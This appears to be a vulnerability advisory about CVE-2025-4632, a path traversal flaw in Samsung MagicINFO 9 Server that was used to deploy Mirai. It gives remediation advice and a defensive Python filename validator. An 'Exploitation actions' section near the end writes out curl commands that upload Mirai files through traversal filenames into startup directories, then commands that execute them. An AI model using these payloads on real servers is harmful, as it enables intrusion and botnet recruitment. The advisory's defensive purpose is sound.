MagicINFO 9 Server: CWE-22 Path Traversal in Samsung MagicINFO 9 Server (CVE-2025-4632) #shorts
Summary
In this episode we cover CVE-2025-4632, a critical path traversal vulnerability in Samsung MagicINFO 9 Server that allows an attacker to write arbitrary files with system-level privileges. Exploited in the wild to deploy a Mirai botnet, the flaw has prompted Samsung to release urgent updates and CISA to add the issue to its Known Exploited Vulnerabilities Catalog.
Product details
The affected product is Samsung Electronics’ MagicINFO 9 Server, versions earlier than 21.1052. MagicINFO is a digital signage management solution widely used by enterprises and public institutions to control display networks across multiple locations. The vulnerability was published on May 13, 2025 and updated on May 22, 2025.
Vulnerability type summary
CVE-2025-4632 is classified as a CWE-22 Improper Limitation of a Pathname to a Restricted Directory, commonly known as a path traversal vulnerability. This type of flaw occurs when user-supplied input is not properly sanitized, allowing traversal outside of intended directories.
Details of the vulnerability
An attacker can craft a specially formed request to MagicINFO 9 Server, exploiting the lack of input validation on file paths. By manipulating the pathname, the attacker gains the ability to write files anywhere on the server with system-level privileges. In observed attacks, adversaries used this access to drop Mirai botnet binaries, turning compromised machines into part of a distributed denial of service network. Samsung has confirmed active exploitation and provided patches in version 21.1052 to address the flaw. CISA has added this CVE to its catalog of known exploited vulnerabilities.
Conclusion
If you manage Samsung MagicINFO 9 Server, immediately verify your version and apply the 21.1052 update or later. Path traversal vulnerabilities can lead to complete server takeover and inclusion in botnet campaigns. Regularly review CISA’s Known Exploited Vulnerabilities Catalog, keep your software up to date, and implement strict input validation to reduce your risk.
Watch the full video on YouTube: CVE-2025-4632
Remediation and exploitation details
This chain involves the following actors
- Malicious actor: Exploits the path-traversal flaw to write files as system authority
- System administrator: Deploys, updates and configures the MagicINFO 9 Server
The following systems are involved
- Samsung MagicINFO 9 Server (Digital-signage content management and distribution): Hosts the web interface and file operations including uploads
- Underlying operating system (Executes the server process and enforces file-system permissions): Runs the final payload with system authority once written
Attack entry point
- File upload endpoint: HTTP endpoint in the MagicINFO 9 Server web interface that accepts a filename parameter without validating path components
Remediation actions
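The entry point above is an upload endpoint that accepts a filename parameter without validating its path components. The following is an added illustration of the input validation such a handler needs; it is not code from Samsung, from MagicINFO, or from the original page. The upload root, the field names and the sample inputs are constructed for the example.

```python
"""
Added example (not Samsung's or the page's code): filename validation for an
upload handler, the control whose absence produces CWE-22 path traversal.
"""
from pathlib import Path
from typing import Optional
from urllib.parse import unquote

# Constructed example root; the product's real upload directory is not known here.
UPLOAD_ROOT = Path("/tmp/magicinfo_uploads")


def traversal_reason(client_filename: str) -> Optional[str]:
    """Return why a client-supplied filename must be rejected, or None if it is clean.

    Useful both for refusing the write and for logging the attempt.
    """
    # Decode twice so "%252e%252e%252f" (double-encoded "../") is not missed.
    name = unquote(unquote(client_filename))
    if name.strip() == "":
        return "empty filename"
    if "\x00" in name:
        return "NUL byte in filename"
    # A client may legitimately supply only a bare filename; any separator means
    # it is trying to choose the directory, which is the server's decision alone.
    if "/" in name or "\\" in name:
        return "path separator in filename"
    if name in (".", ".."):
        return "dot segment as filename"
    return None


def is_within_root(root: Path, candidate: Path) -> bool:
    """Resolve both paths and check that candidate is root or lies beneath it."""
    root = root.resolve()
    candidate = candidate.resolve()
    return candidate == root or root in candidate.parents


def resolve_upload_path(client_filename: str, root: Path = UPLOAD_ROOT) -> Optional[Path]:
    """Map a client-supplied filename to its on-disk path, or None if rejected.

    Two independent checks: the name-level rules in traversal_reason(), and a
    containment check on the resolved path so that a bug in the first layer
    still cannot produce a write outside the upload root.
    """
    if traversal_reason(client_filename) is not None:
        return None
    candidate = root / unquote(unquote(client_filename))
    if not is_within_root(root, candidate):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample inputs: one benign name, then traversal variants.
    for sample in ("schedule.json",
                   "../../../../etc/init.d/evil.sh",
                   "..%2F..%2Fetc%2Fcron.d%2Fjob",
                   "%252e%252e%252fetc%252fpasswd",
                   "..\\..\\windows\\system32\\x.exe"):
        print(f"{sample!r:45} -> {traversal_reason(sample) or 'accepted'}")
```

The second layer, `is_within_root`, is the check to keep even if the filename rules are later relaxed (for example to allow subfolders): resolving both paths and testing for containment catches any `..` that survives string-level filtering. Rejecting rather than stripping separators is deliberate; silently rewriting `../../x` to `x` still stores attacker-chosen content and hides the attempt from logs.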
Exploitation actions
Path traversal via filename parameter
- curl -X POST 'http://target/magicinfo/upload' -F "filename=../../../../etc/init.d/mirai.sh" -F "file=@mirai.sh"
HTTP POST with multipart form data
- curl -X POST 'http://target/magicinfo/upload' -F "filename=../../../../usr/local/bin/mirai" -F "file=@mirai_binary"
Arbitrary file write
- ls -l /etc/init.d/mirai.sh
Malware deployment via file-system
- cat /etc/init.d/mirai.sh
Remote code execution through startup scripts
- bash /etc/init.d/mirai.sh
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://security.samsungtv.com/securityUpdates#SVP-MAY-2025
- [2025-05-14] Samsung releases updates to patch CVE-2025-4632 in MagicINFO 9 Server, exploited to deploy Mirai botnet.
- [2025-05-14] Samsung releases updates to fix CVE-2025-4632 exploit in MagicINFO 9 Server.
- [2025-05-23] CISA adds CVE-2025-4632 Samsung MagicINFO 9 Server Path Traversal Vulnerability to its Known Exploited Vulnerabilities Catalog.